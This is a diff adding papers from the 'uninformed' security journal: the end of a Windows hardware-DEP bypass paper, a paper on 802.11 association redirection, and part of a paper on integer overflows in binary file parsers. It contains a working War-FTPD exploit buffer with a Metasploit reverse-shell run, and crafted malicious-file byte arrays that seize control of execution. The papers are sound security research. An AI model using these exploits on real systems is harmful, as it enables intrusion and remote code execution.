vulnerability is a simple stack overflow. Prior to our modifications, the
exploit was implemented in the following manner:
my $evil = $self->MakeNops(1024);
substr($evil, 485, 4, pack("V", $target->[1]));
substr($evil, 600, length($shellcode), $shellcode);
This code built a NOP sled of 1024 bytes. At byte index 485, the return address
was stored after which point the shellcode was appended [4]. When run against a target
that supports hardware-enforced DEP, the exploit fails when it tries to execute
the first instruction of the NOP sled because the region of memory (the thread
stack) is marked as non-executable.
Applying the technique described above, the authors changed the exploit to send
a buffer structured as follows:
my $evil = "\xcc" x 485;
$evil .= "\x80\x20\x95\x7c";
$evil .= "\xff\xff\xff\xff";
$evil .= "\xf8\xd3\x91\x7c";
$evil .= "\xff\xff\xff\xff";
$evil .= "\xcc" x 0x54;
$evil .= pack("V", $target->[1]);
$evil .= $shellcode;
$evil .= "\xcc" x (1024 - length($evil));
In this case, a buffer was built that contained 485 int3 instructions. From
there, the buffer was set to overwrite the return address with a pointer to
ntdll!NtdllOkayToLockRoutine. Since this routine does a retn 0x4, the next four
bytes are padding as a fake argument that is popped off the stack. Once
NtdllOkayToLockRoutine returns, the stack would point 493 bytes into the evil
buffer that is being built (immediately after the 0x7c952080 return address
overwrite and the fake argument). This means that NtdllOkayToLockRoutine would
return into 0x7c91d3f8. This block of code is what evaluates the low byte of
eax and eventually leads to the disabling of NX support for the process. Once
completed, the block pops saved registers off the stack and issues a leave
instruction, moving the stack pointer to where ebp currently points. In this
case, ebp was 0x54 bytes away from esp, so we inserted 0x54 bytes of padding.
Once the block does this, the stack pointer will point 577 bytes into the evil
buffer (immediately after the 0x54 bytes of padding). This means that it will
return into whatever address is stored at this location. In this case, the
buffer is populated such that it simply returns into the target-specified return
address (which is a jmp esp equivalent instruction). From there, the jmp esp
instruction is executed which transfers control into the shellcode that
immediately follows it. Once executed, the exploit works as if nothing had
changed:
$ ./msfcli warftpd_165_user_dep RHOST=192.168.244.128 RPORT=4446 \
LHOST=192.168.244.2 LPORT=4444 PAYLOAD=win32_reverse TARGET=2 E
[*] Starting Reverse Handler.
[*] Trying Windows XP SP2 English using return address 0x71ab9372....
[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
[*] Sending evil buffer....
[*] Got connection from 192.168.244.2:4444 <-> 192.168.244.128:46638
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\War-ftpd>
As can be seen, the technique described in this document outlines a feasible
method that can be used to circumvent the security enhancements provided by
hardware-enforced DEP in the default installations of Windows XP Service Pack 2
and Windows 2003 Server Service Pack 1. The flaw itself is not related to any
specific inefficiency or mistake made during the actual implementation of
hardware-enforced DEP support, but instead is a side effect of a design decision
by Microsoft to provide a mechanism for disabling NX support for a process from
within a user-mode process. Had it been the case that there was no mechanism by
which NX support could be disabled at runtime from within a process, the
approaches outlined in this document would not be feasible.
In the interest of not presenting a problem without also describing a solution,
the authors have identified a few different ways in which Microsoft might be
able to solve this. To prevent this approach, it is first necessary to identify
the things that it depends on. First and foremost, the technique depends on
knowing the location of three separate addresses. Second, it depends on the
feature being exposed that allows a user-mode process to disable NX support for
itself. Finally, it depends on the ability to control the stack in a manner
that allows it perform a ret2libc style attack [5].
The first dependency could be broken by instituting some form of Address Space
Layout Randomization that would thereby make the location of the dependent code
blocks unknown to an attacker. The second dependency could be broken by moving
the logic that controls the enabling and disabling of a process' NX support to
kernel-mode such that it cannot be influenced in such a direct manner. This
approach is slightly challenging considering the model that it is currently
implemented under requires the ability to disable NX support when certain events
(such as the loading of an incompatible DLL) occur. Although it may be more
challenging, the authors see this as being the most feasible approach in terms
of compatibility. Lastly, the final dependency is not really something that
Microsoft can control. Aside from these potential solutions, it might also be
possible to come up with a way to make it so the permanent flag is set sooner in
the process' initialization, though the authors are not sure of a way in which
this could be made possible without breaking support for disabling when certain
DLLs are loaded.
In closing, the authors would like to make a special point to indicate that
Microsoft has done an excellent job in raising the bar with their security
improvements in XP Serivce Pack 2. The technique outlined in this document
should not be seen as a case of Microsoft failing to implement something
securely, as the provisions are certainly there to deploy hardware-enforced DEP
in a secure fashion, but instead might be better viewed as a concession that was
made to ensure that application compatibility was retained for the general case.
There is almost always a trade-off when it comes to providing new security
features in the face of potential compatibility problems, and it can be said
that perhaps no company other than Microsoft is more well known for retaining
backward compatibility.
Footnotes
[1] There are other documented techniques for bypassing non-executable
protections, such as returning into ZwProtectVirtualMemory or doing a chained
ret2libc style attack, but these approaches tend to be more complicated and in
many cases are more restricted due to the need to use bytes (such as NULL
bytes) that would otherwise be unusable in common situations.
[2] With a few parameters that will be discussed later.
[3] The reason this has to point to 2 and not some integer that has just the low
byte set to 2 is because nt!MmSetExecutionOptions has a check to ensure that the
unused bits are not set.
[4] In reality, it may not be the return address that is being overwritten, but
instead might be a function pointer. The fact that it is at a misaligned
address lends credence to this fact, though it is certainly not a clear
indication.
[5] This is possible even when an SEH overwrite is leveraged, given the right
conditions. The basic approach is to locate a pop reg, pop reg, pop esp, ret
instruction set in a region that is not protected by SafeSEH (such as a
third-party DLL that was not compiled with /GS). The pop esp shifts the stack
to the start of the EstablisherFrame that is controlled by the attacker and the
ret returns into the address stored within the overwritten Next pointer. If one
were to set the Next pointer to the location of the NtdllOkayToLockRoutine and
the stack were set up as explained above, the technique used to bypass
hardware-enforced DEP that is described in this document could be made to work.
Bibliography
The Metasploit Project. War-ftpd 1.65 USER Overflow.
http://www.metasploit.com/projects/Framework/exploits.html#warftpd_165_user;
accessed Oct 2, 2005.
Microsoft Corporation. Data Execution Prevention.
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/BookofSP1/b0de1052-4101-44c3-a294-4da1bd1ef227.mspx;
accessed Oct 2, 2005.

235
uninformed/2.4.txt Normal file
View File

@ -0,0 +1,235 @@
802.11 VLANs
Johnny Cache
johnycsh@gmail.com
Last modified: 09/07/05
1) Foreword
Abstract: The goal of this paper is to introduce the reader to association
redirection and how it could to used to implement something analogous to VLANs
found in wired media into a typical IEEE 802.11 environment. What makes this
technique interesting is that it can be accomplished without breaking the IEEE
802.11 standard on the client side, and requires only minor changes made to the
Access Point (AP). No modifications are made to the 802.11 MAC. It is the
author's hope that after reading this paper the reader will not only
understand the specific technique outlined below, but will consider protocol
quirks with a new perspective in the future.
2) Background
The IEEE 802.11 specification defines a hierarchy of three states a client can
be in. When a client wishes to connect to an Access Point (AP) he progresses
from state 1 to 2 to 3. The client progresses initially from state 1 to state 2
by successfully authenticating (this authentication stage happens even when
there is no security enabled). Similarly the client progresses from state 2 to
3 by associating. Once a client as associated he enters state 3 and can
transmit data using the AP.
Unlike ethernet, 802.3, or other link layer headers, 802.11 headers contain at
least 3 addresses: source, destination, and Basic Service Set ID (BSSID). The
BSSID can be best thought of as a through field. Packets destined for the APs
interface have both destination and BSSID set to the same value. A packet
destined to a different host on the same WLAN however would have the BSSID set
to the AP and the destination set to the host.
The state transition diagram in the standard dictates that if a client receives
an association response with a different BSSID than the BSSID that it was
associating with, then the client should associate to the new BSSID. The
technique of sending an association response with a different BSSID in the
header is known as association redirection. While the motivation for this
idiosyncrasy is unclear, it can be leveraged to dynamically create what has
been described as a personal virtual bridged LAN (PVLAN).
3) Introduction
The most compelling reason to virtualize APs has been security. There are
currently two possible techniques for doing this, though only one has been
deployed in the wild. The most prevalent has been implemented by Colubris in
their virtual access point technology.
The other technique, public access point (PAP) and personal virtual bridged
LANs (PVLANs), which is described in this paper, has been documented in U.S.
patent no. 20040141617.
3.1) The state of the art
The Colubris virtual access point technology is a single physical device that
implements an entirely independent 802.11 MAC protocol layer (including a
unique BSSID) for each virtual AP. The only thing shared between the individual
virtual APs is the hardware they are running on. The device goes so far as to
implement virtual Management Information Bases (MIBs) for each virtual AP. The
Colubris solution fits well into a heavily managed static environment where the
users and the groups they belong to are well defined. Deploying it requires
that each user knows which SSID to associate with a priori, along with any
required authentication credentials. The virtual access point is capable of
mapping virtual access points into 802.1q VLANs.
The public AP solution fits well into less managed networks. Public AP
utilizes the technique outlined in this paper. The Public AP broadcasts a
single beacon for a Public Access Point (PAP). When a client attempts to
associate, the PAP redirects him to a dynamically generated VBSSID, placing him
on his own PVLAN. This is well suited to a typical hotspot scenario where there
is no implicit trust between users, and the number of clients is not known
beforehand. This technique could also be used in conjunction with traditional
802.1q VLANs, however its strength lies in the lower burden of administrative
requirements. This technique is designed to work well when deployed in the
common hot spot scenario where the administrators have little other network
infrastructure and the only thing upstream is a best effort common carrier
provider.
4) PVLANs and virtual BSSIDs
PVLANs are called Personal Bridged VLANs because the VLAN is created
dynamically for the client. The client essentially owns the VLAN since he
controls its creation and its lifetime. In the most common scenario there
would only be a single client per PVLAN.
An access point that implements the PAP concept intentionally re-directs
associating clients to their own dynamically generated BSSID (Virtual BSSID or
VBSSID).
In the example below the AP is broadcasting a public BSSID of 00:11:22:33:44:55
and is redirecting the client to his own VBSSID 00:22:22:22:22:22.
5) The Experiment
The experiment conducted was not a full-blown implementation of a PAP. The
experiment was designed to test a wide variety of chipsets, cards, and drivers
for compatibility with the standard and susceptibility to association
re-direction. To this end all the cards were subjected to every reasonable
intrepretation of the standard.
The experiment was conducted by making some simple changes to the host-ap
driver on Linux. Host-ap can operate in Access Point mode as well as in client
mode. All the modifications were made in Access Point mode. Host-ap's
client-side performance is unrelated to the changes made for the experiment.
The experiment was conducted in two phases. First, host-ap was modified to
mangle all management frames by modifying the source, BSSID, source and BSSID
(at the same time). The results of this are reflected in table one.
After this was complete, host-ap was modified to return authentication replies
un-mangled. This was due to the amount of cards that simply ignored mangled
authentication replys. These results are cataloged in table two.
5.1) The Results
The responses in table one varied all the way from never leaving stage 1 to
successful redirection. The most interesting cases are the drivers that
successfully made it to stage 3. There are three cases of this. The cases
marked ORIGINALBSSID are what was initially expected from many devices, that
they would simply ignore the redirect request and continue to transmit on the
PAP BSSID. The REDIRECTREASSOC case is a successful redirection with a small
twist. The card transmits all data to VBSSID, however it periodically sends
out reassociation requests to the PAP BSSID.
The SCHIZO case is the other case that made it into stage 3. In this case the
card is listening on the PAP BSSID and then proceeds to transmit on the VBSSID.
The device seems to ignore any data transmitted to it on the VBSSID.
As mentioned previously in table two, the possibilty of ignoring authentication
reply's has been eliminated by not mangling fields until the association
request. This opened up the possibilty for some interesting responses.
The Apple airport extreme card responded with a flood of deauthentication
packets to the null BSSID with a destination of the AP (DEAUTHFLOOD). The
Atheros card is the only other card that sent a deauth, though it had a much
more measured response, sending a single de-auth to the original BSSID
(SIMPLEDEAUTHSTA).
The other new response in table 2 is the DUALBSSID behavior. These cards seem
to alternate intentionally between both BSSIDS on every other transmitted
packet. It is unknown whether they continue to do this for the entire
connection or if this is some sort of intentional behavior and they will choose
whichever BSSID they receive data on first.
The experiment provided some very surprising results. Originaly it was
suspected that many cards would simply never enter stage 3, or alternately just
use the original BSSID they set out to. Quite a few cards can be convinced to
go into dual BSSID behavior and might be susceptible to association
redirection. Two drivers for the hermes chipset were successfuly redirected.
6) Future Work
Clearly modifying client side drivers for better standards compliance is one
area work could be done. More interesting questions are how does one handle key
management on the AP in this situation? Clearly any PSK solutions don't really
apply in this scenario. How much deviation from the spec needs to happen for
WPA 802.1x authentication to successfully be deployed? One interesting area of
research is the concept of a stealthy rogue AP.
By using association redirection clients could be the victim of stealthy (from
the perspective of the network admin) association hijacking from a rogue AP. An
adversary could just set up shop with a modified host-ap driver on a Linux box
that didn't transmit beacons. Rather it would wait for a client to attempt an
association request with the legitimate access point and try to win a race
condition to see who could send an association reply first. Alternately the
adversary could simply de-authenticate the user and then be poised to win the
race.
Another interesting question is the whether or not a PAP could withstand a DOS
attack attempting to create an overwhelming amount of VBSSIDs. It is the
authors opinion that a suitable algorithm could be found to make the resources
required for the attack too costly for most. By dynamically expiring PVLANs and
VBSSIDs as a function of time and traffic the PAP could burden the attacker
with keeping track of all his VBSSIDs as well, instead of just creating as many
as he can and forgetting about them.
7) Conclusion
It is unlikely that this technique could be successfully be deployed to create
PVLAN's in a general scenario due to varied behavior from the vendors.
However, it does appear that a determined attacker could encode the data
generated from this experiment into a modified host-ap driver so that he could
stealthily redirect traffic to himself. This would give the attacker a slight
advantage over typical ARP poisioning attacks since he doesn't need to generate
any suspicous ARP activity. It also has an advantage over simple rogue access
points, as it requires no beacons which can easily be detected.
8) Bibliography
Volpano, Dennis. United States Patent Application 200403141617 July 22, 2003
http://appft1.uspto.gov/netahtml/PTO/search-adv.html
Institute of Electrical and Electronics Engineers.
Information technology - Telecommunications and information
exchange between systems - Local and metropolitan area networks - Specific
Requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical
Layer (PHY) Specifications, IEEE Std. 802.11-1999, 1999. (pg 376)
1999
Aboba, Bernard.
Virtual Access Points (IEEE document IEEE 802.11-03/154r1) May 22, 2003
http://www.drizzle.com/ aboba/IEEE/11-03-154r1-I-Virtual-Access-Points.doc
Colubris Networks. Virtual Access Point Technology Multiple WLAN Services
http://www.colubris.com/literature/whitepapers.asp
accessed Aug 09, 2005.

25
uninformed/2.txt Normal file
View File

@ -0,0 +1,25 @@
Engineering in Reverse
Inside Blizzard: Battle.net
Skywing
This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat service, Battle.net. The paper provides some background historical information into the design and purpose of Battle.net and continues on to discuss a variety of flaws that have been observed in the implementation of the system. Readers should come away with a better understanding of problems that can be easily introduced in designing a matchmaking/chat system to operate on such a large scale in addition to some of the serious security-related consequences of not performing proper parameter validation of untrusted clients.
html | pdf | txt
Exploitation Technology
Temporal Return Addresses
skape
Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable.
html | pdf | txt | code.tgz
Bypassing Windows Hardware-enforced DEP
skape & Skywing
This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits.
html | pdf | txt
General Research
802.11 VLANs and Association Redirection
Johnny Cache
The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. What makes this technique interesting is that it can be accomplished without breaking the IEEE 802.11 standard on the client side, and requires only minor changes made to the Access Point (AP). No modifications are made to the 802.11 MAC. It is the author's hope that after reading the paper the reader will not only understand the specific technique outlined below, but will consider protocol specifications with a new perspective in the future.
html | pdf | txt

2069
uninformed/3.1.txt Normal file

File diff suppressed because it is too large Load Diff

1490
uninformed/3.2.txt Normal file

File diff suppressed because it is too large Load Diff

599
uninformed/3.3.txt Normal file
View File

@ -0,0 +1,599 @@
Analyzing Common Binary Parser Mistakes
Orlando Padilla
xbud@g0thead.com
Last modified: 12/05/2005
Abstract: With just about one file format bug being
consistently released on a weekly basis over the past six to twelve
months, one can only hope developers would look and learn. The
reality of it all is unfortunate; no one cares enough. These bugs
have been around for some time now, but have only recently gained
media attention due to the large number of vulnerabilities being
released. Researchers have been finding more elaborate and passive
attack vectors for these bugs, some of which can even leverage a
remote compromise.
No new attacks will be presented in this document, as examples and
an example file format will be presented to demonstrate an insecure
implementation of a parsing library. As a bonus for reading this
article, an undisclosed bug in a popular debugger will be released
during the case study material of this paper. This vulnerability,
if leveraged properly, will cause the debugger to crash during the
loading of a binary executable or dynamic library.
Disclaimer: This document is written with an educational
interest and I cannot be held liable for any outcome of the
information being released.
Thanks: #vax, nologin, and jimmy haffa
= Introduction
A number of papers have already been written describing the
exploitation of integer overflows, however, very few publications
have been aimed at the exploitation of integer overflows within
binary parsers. The current slew of advisories released by iDefense
(Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and
Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format
bugs should be enough to take these bugs seriously.
The most common mistake applied by a programmer is in trusting a
field inside a binary structure that should not be trusted. During
the design phase: efficiency, simplicity and the secure
implementation of a particular project should be at the top of the
priority list. When dealing with data that cannot be presented only
as strings, a length field is required to tell the application when
to stop reading. When dealing with sections that must have
subsections, knowing ahead of time how many sections are embedded
within the primary section of a structure is required and again, a
value must be used to instruct the application only to iterate
x number of times. In the following paragraphs, the
description of a binary file structure will be presented, followed
by applied examples of typical coding errors encountered when
auditing applications. An overview of integer overflows will be
discussed for the sake of completeness. Finally, a case study of
several bugs found during the research of a particular file format
will be shown.
= Certificate Storage File
The following file format was designed and written specifically for
this article and has no real world applicable use. The general idea
behind the implementation of this file format is to create a single
binary file acting as a searchable database for certificate files.
The file will consist of two core structures, which will hold the
information necessary to parse the certificates in DER format. This
is a rough diagram of what the file looks like after compilation:
+----------------------+-----------+---------+
| Structure | Offset | Size |
+----------------------+-----------+---------+
| OP Header | 0 | 4 |
| Element Count | 4 | 2 |
| Cert File Fmt Struct | 6 | 6 |
| Cert Data Struct | 12 | 16 |
| Cert 1 | | |
| Cert 2 | | |
| Cert | | |
| Cert n | | |
+----------------------+-----------+---------+
= Binary Layout
The following structures are defined on the file format's compiler
library.
typedef struct _CERTFF
{
unsigned int NumberOfCerts;
unsigned short PointerToCerts;
}CERTFF,*PCERTFF;
typedef struct _CERTDATA
{
char Name[8];
unsigned short CertificateLen;
unsigned short PointerToDERs;
unsigned char *DataPtr;
}CERTDATA,*PCERTDATA;
The first data structure consists of two unsigned integers, (short)
NumberOfCerts and (long) PointerToCerts. These hold the number of
certificates in total, stored in this binary NumberOfCerts and the
offset from the beginning of the file to the first certificate data
structure CERTDATA PointerToCerts. We can already assume that a
parser will iterate through the image file NumberOfCerts times,
starting from PointerToCerts in chunks of the size of CERTDATA at a
time. The second data structure consists of a character array 8
bytes in size, which is used to hold the first 7 characters of a
certificate's description, followed by two unsigned short integers
which hold the length of the certificate referred to by this
structure, and the offset to the beginning of the certificate
respectively. The last element is an unsigned char, which is used
to carry the body of the certificate by the compiler.
= Applied Examples
As the number of buffer overflows decreases, the number of integer
overflows and improper file and binary protocol parsing bugs
increases. The following URL query to OSVDB's (Open Source
Vulnerability) database for integer overflows is a perfect example
of the diversity of applications affected. The list is rather short
considering the number of vulnerabilities actually released in the
past two - three years. Still, it accurately displays different
levels of severity: Kernel, Library, Protocol and file format bugs.
http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search
As a proof of concept, I developed a parsing library for the
construct above. See Appendix A for code. The code functionality
is simple. As explained above it consolidates certificates (in this
example) into a single file. There are several bugs in the library
that I mocked from actual implementations of different open source
and closed source applications. The first vulnerability exists in
the single cert extraction tool 'certextract.c'. The issue is
pretty obvious; the library trusts that the file being parsed has
not been tampered with. The following code snippet highlights the
issue:
igned char cert_out[MAX_CERT_SIZE];
16 unsigned char *extract_cert = "req1.DER";
...
64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert));
65
66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen);
...
The vulnerability exists because the library assumes the certificates
will not be larger than MAX_CERT_SIZE due to the compiler's
inability to take files larger than the set size. All an attacker has
to do is modify the file using an external editor or reverse engineering
the file format and creating a malicious certificate db. A step-by-step
example on exploitation of this bug is out of the scope of this
document, but let's look at what has to be done to prepare an exploit
for this vulnerability.
We already know we have to modify the length field to something
larger than MAX_CERT_SIZE or if we look specifically at
'certlib.h', larger than 2048 bytes. Looking at the structure of
the headers, we can see that each certificate has its own length
field. So creating a valid structure header and placing it at a
correct offset along with a corresponding payload should do the
trick. With this in mind, calculate the number of bytes from the
beginning of the file to the first certificate.
[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct]
It seems we can drop our fake structure after the 12th byte. The
cert structure will look something like the following (depending on
the size of the payload you are using):
unsigned char exploit_dat1[] = {
/* Name of our fake cert */
0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
/* our, length */
0x53, 0x08,
/* where we can write our data, PointerToDer*/
0x18, 0x00,
/* DataPtr just for completion */
0x00, 0x00, 0x00, 0x00
};
Notice the length is an unsigned short integer that limits our payload
to 0xFFFF (65535), which should be more than enough space. The
two most important sections of our structure are the length, and the value
we give PointerToDer since this will point to the beginning of our
payload. Since we are choosing to make our fake certificate the first
one on the list, anything below it can be overwritten with little
concern. At offset 0x18 of the dat file we have 0x0853
bytes of A's, notice there is no bounds check on this value. Below is a
sample run of a valid certsdb.dat file and a second sample run with our
malicious dat file.
(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER
cert req1.DE
len: 657 PtrToData: 90
(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER
e3e45e30b18a6fc9f6134f0297485cc1 req1.DER
e3e45e30b18a6fc9f6134f0297485cc1 out.DER
(gdb) r ./badcertdb.dat out.DER
Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER
cert req1.DE
len: 2131 PtrToData: 27
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
The actual exploitation of this vulnerability is left as an exercise
for the reader, given the file structure necessary to build the attack
it is now trivial to complete.
= Continuing Applied Examples
The utility 'certdb2der.c' provided in this example suite iterates
through the dat file and dumps the contents of each certificate into
individual files. The CERTFF (Certificate File Format) structure
contains an element called NumberOfCerts of type unsigned int. This
integer explicitly controls the loop iterator, controlling the number
of CERTDATA structures said to be in the body of dat file.
59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT);
60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA);
61
62 pCertData = (PCERTDATA)malloc(alloc_size);
63
64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1);
An integer overflow condition may be triggered during memory allocation
for the 'pCertData' array of structures. If a specially crafted dat
file contains a high enough value during memory allocation, pCertDat
array is deemed inproper by the multiplication in
line 60 (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA).
The maximum value for an unsigned integer is (4294967295) or
0xffffffff, so when the value at NumberOfCerts is multiplied
by sizeof(CERTDATA) or 16 bytes an overflow occurs causing the value
to wrap resulting in an invocation negative malloc() or a malloc(0).
This could then be leveraged into executing arbitrary code on certain
malloc implementations by overwriting control structures in the heap.
Again, exploitation is not covered in detail, but pre-exploitation is
explained below. Please refer to the references section for papers
covering heap overflow exploitation.
Constructing a fake valid CERTFF chunk and properly placing it in a dat
file will be what most of the work consists of when preparing for file
format exploit. The first 6 bytes of our file will remain the same, so
we can assume our exploit to look something to the following:
[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...]
[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ]
unsigned char exploit_dat1[] = {
/* header info */
0x4f, 0x50, 0x00, 0x00, 0x01, 0x00,
/* our length followed by our certs pointer */
0xff, 0xff, 0xff, 0xff,
0x0a, 0x00,
/* One valid cert */
0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
/* our length */
0x00, 0x07,
/* where we can write our data to PointerToDer*/
0x00, 0x26,
/* DataPtr useless to us */
0x00, 0x00, 0x00, 0x00,
};
unsigned char exploit_dat2[] = {
/* fake certs for fill */
0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00,
/* our length */
0x00, 0x10,
/* where we can write our data to PointerToDer*/
0x26, 0x04,
/* DataPtr useless to us */
0x00, 0x00, 0x00, 0x00,
};
The pseudo code below denotes the structure of the rest of the binary
dat file.
for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2))
memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2));
In short, the code copies the contents of our second structure
, after the 24th byte till the end of the buffer is
reached. The following displays an iteration of the utility used correctly,
followed by an iteration through the malicious certificates db file.
(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat
req1.DE of length: 657 is being written to disk...
req2.DE of length: 649 is being written to disk...
req3.DE of length: 653 is being written to disk...
req4.DE of length: 651 is being written to disk...
req5.DE of length: 652 is being written to disk...
(xbud@yakuza <~/code/random>) $
(gdb) r 2badcertdb.dat
Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat
Program received signal SIGSEGV, Segmentation fault.
0xb7e1267f in memcpy () from /lib/tls/libc.so.6
(gdb) x/i $pc
0xb7e1267f <memcpy+47>: repz movsl %ds:(%esi),%es:(%edi)
(gdb)i reg
eax 0xffffffff -1
ecx 0x3fff9c02 1073716226
edx 0x804a008 134520840
...
Reconstructing our memcpy(buf,edx (our fake certs), eax (-1)), the value
stored in eax is -1 which when converted to unsigned inside memcpy, 4GB
of data are copied into our destination buffer of only 0x800 bytes in
size.
= Case Study
= The Microsoft PE/COFF Headers
There a number of documents and tools out there that explain the
structure of Microsoft's infamous PE (Portable Executable) and old
Unix Style COFF (Common Object File Format) header. As such, I will
refrain from elaborating on what each element inside each structure
does. Instead, I will focus on the critical sections that may allow
an attacker to alter the contents of header elements specifically to
break implementations of PE/COFF parsers.
With that in mind we can now begin our journey into the world of PE.
At file offset 0x3C as specified in MS's pecoff.doc, there is a four
byte signature PE, immediately after the signature of the
image file, there is a standard COFF header of the following format:
IMAGE_FILE_HEADER //(Coff)
{
unsigned short Machine;
unsigned short NumberOfSections;
unsigned int TimeDateStamp;
unsigned int PointerToSymbolTable;
unsigned int NumberOfSymbols;
unsigned short SizeOfOptionalHeader;
unsigned short Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
Does anything look similar to our hypothetical file format used in
the examples above?
NumberOfSections and NumberOfSymbols are all synonymous to
NumberOfCerts with respect to their own file format. These
elements, along with SizeOfOptionalHeader make for interesting
attack vectors. Before strolling further along into the COFF Header
specifics, it is important to pay a bit more attention to the offset
0x3C being referred to in the PECOFF.doc document. It
states that the file offset specified at offset 0x3C from
the image file, points to the PE signature.
What would happen if this file offset was bogus? What if the offset
at offset 0x3C points to fstat(image).st_size + 1 ?
We cause the parser to access illegal memory. This bug was present in
the majority of the PE Viewers tested. Although the significance of this
bug is minimal since the modified binary will no longer execute, picture a
scenario where an attacker simply needs to crash an application which
happens to preprocess a PE Header? All an attacker must do to trigger
this bug is build a fake MZ header also known as a Dos Stub header and
invalidate the 0x3C offset. The MS-DOS Stub is a
valid application that runs under MS-DOS and is placed at the front of the
.EXE image. The linker places a default stub here, which prints out the
message "This program cannot be run in DOS mode" when the image is run in
MS-DOS.
The second element, NumberOfSections, indicates the number of
Section Headers this file has mapped. Once again, fuzzing this
element with random numbers yields interesting results on tools
like, MSVC dumpbin.exe, PEView, PE Explorer, msfpescan etc...
Continuing our dive into PE madness, following the COFF Header there
is an OPTIONAL_HEADER also referred to as the PE Header which
consists of the following elements:
_IMAGE_OPTIONAL_HEADER32 {
unsigned short Magic;
...
unsigned int ImageBase;
...
unsigned short MajorOperatingSystemVersion;
unsigned short MinorOperatingSystemVersion;
...
unsigned int SizeOfImage;
unsigned int SizeOfHeaders;
...
unsigned int LoaderFlags;
unsigned int NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
There were a number of elements omitted here for the sake of brevity,
most of which aid the loader in identifying the type of file and its
core mappings. Please refer to the appendix for more information on
what each specific element means. Again, several elements in this
structure look interesting enough to play with, however we will only be
looking at the IMAGE_DATA_DIRECTORY array of entries. In
particular, the first index of that directory contains a pointer to the
structures. The element EXPORT/IMPORT_DIRECTORY_TABLE
NumberOfRvaAndSizes in the structure above refers to the number of
elements in the DataDirectory array. The following is the
structure which is the last structure
fuzzed for this case study.
_EXPORT_DIRECTORY_TABLE {
unsigned long Characteristics;
unsigned long TimeDateStamp;
unsigned short MajorVersion;
unsigned short MinorVersion;
unsigned long NameRVA;
unsigned long OrdinalBase;
unsigned long NumberOfFunctions;
unsigned long NumberOfNames;
unsigned long ExportAddressTableRVA;
unsigned long ExportNameTableRVA;
unsigned long ExportOrdinalTableRVA;
} EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE;
The Export Directory Table contains address information that is
used to resolve fix-up references to the entry points within this image.
The elements NumberOfFunctions, NumberOfNames indicate the obvious and
again if something trusts the number in this structure without error
checking, unexpected results can occur.
= Introducing breakdance.c
Although file fuzzing is relatively simple, tools help reduce the amount
of time it takes for you to reconstruct a format to reach deep into a
section buried within several structures. I typically use
xxd -i, hd (hexdump), or shred (hexeditor)
for windows to reconstruct a binary image and fuzz the structures
manually, but I decided to develop a tool to do the work for me in the
case of PE. The following options are available:
Usage: ./breakdance [parameters]
Options:
-v verbose
-o [file] File to write to (defaults) out.ext
-f [file] File to read from
-e [value] Modify Export Directory Table's number
of functions and number of names
-p Print sections of a PE file and exit
-c Create new section (.pepe) not to be used with -m
-s [section] Section to overwrite (can be used with -c)
-m [section] [value]
-n [length] Fuzz Export Directory Table's Strings
Modify [section] with [int] where:
section is one of [image_start] [number_of_sections]
ex. ./breakdance -v -o out -f pebin -m "image_start" 65536
ex. ./breakdance -v -o out -f pebin -c -s .rdata
[Warning if -o option isn't provided with mod options, changes are discarded]
The following is a list of binary parsers affected by the fuzzing options
provided by breakdance.c, the list is by no means comprehensive in the
sense of PE parsers but it is all I test against. The fuzzing capabilities
